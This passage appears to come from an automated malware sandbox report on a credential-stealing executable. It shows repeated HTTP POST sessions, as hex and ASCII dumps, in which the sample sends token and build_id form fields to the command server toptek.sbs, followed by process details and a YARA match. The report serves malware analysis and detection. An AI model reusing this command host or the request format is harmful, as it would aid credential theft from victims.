                                                                                                                                                                                                                                                                                    2024-12-23 05:59:07 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 58 54 4a 35 58 42 49 45 55 33 45 55 33 57 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 58 54 4a 35 58 42 49 45 55 33 45 55 33 57 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 58 54 4a 35 58 42 49 45 55 33 45 55 33 57 34 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------PHLXTJ5XBIEU3EU3W4W4Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------PHLXTJ5XBIEU3EU3W4W4Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:07 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:08 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    81192.168.2.55012394.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:09 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----58GVKXT2VAAIEUSR1VAA
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:09 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 58 54 32 56 41 41 49 45 55 53 52 31 56 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 58 54 32 56 41 41 49 45 55 53 52 31 56 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 58 54 32 56 41 41 49 45 55 53 52 31 56 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------58GVKXT2VAAIEUSR1VAAContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------58GVKXT2VAAIEUSR1VAAContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------58GVKXT2VAAIEUSR1VAACont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    82192.168.2.55012994.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:10 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----4WTRQQIMOZUAIEK6PPHL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:10 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 52 51 51 49 4d 4f 5a 55 41 49 45 4b 36 50 50 48 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------4WTRQQIMOZUAIEK6PPHLContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------4WTRQQIMOZUAIEK6PPHLContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------4WTRQQIMOZUAIEK6PPHLCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:10 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    83192.168.2.55013594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:12 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ZCJ5X4E3W4EUAIEKXL6F
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:12 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------ZCJ5X4E3W4EUAIEKXL6FContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------ZCJ5X4E3W4EUAIEKXL6FContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------ZCJ5X4E3W4EUAIEKXL6FCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    84192.168.2.55013694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:13 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HD2DTJM7GVAIEUKNOHVA
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:13 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 32 44 54 4a 4d 37 47 56 41 49 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 32 44 54 4a 4d 37 47 56 41 49 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 32 44 54 4a 4d 37 47 56 41 49 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------HD2DTJM7GVAIEUKNOHVAContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------HD2DTJM7GVAIEUKNOHVAContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------HD2DTJM7GVAIEUKNOHVACont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:13 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    85192.168.2.55014294.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:15 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----Q90R90ZMOZUAIMGDJMOZ
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:15 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 51 39 30 52 39 30 5a 4d 4f 5a 55 41 49 4d 47 44 4a 4d 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Q90R90ZMOZUAIMGDJMOZCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:15 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    86192.168.2.55014594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:16 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----58YU37G4OZU37YUAS2NY
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:16 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 55 33 37 47 34 4f 5a 55 33 37 59 55 41 53 32 4e 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------58YU37G4OZU37YUAS2NYContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------58YU37G4OZU37YUAS2NYCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:16 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    87192.168.2.55015194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:18 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:18 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------FCB1VK689RQIEUAIMOPZCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    88192.168.2.55015594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:19 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KN7Y5FUK6F37YU3OPHVS
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1829
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:19 UTC1829OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4e 37 59 35 46 55 4b 36 46 33 37 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 37 59 35 46 55 4b 36 46 33 37 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 37 59 35 46 55 4b 36 46 33 37 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------KN7Y5FUK6F37YU3OPHVSCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:59:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:59:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                    Start time:00:57:14
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\gVKsiQIHqe.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    File size:147'968 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:2E45D5934DB7DA8FF7B560A80CEB96AB
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                    Start time:00:57:31
                                                                                                                                                                                                                                                                                    Start date:23/12/2024
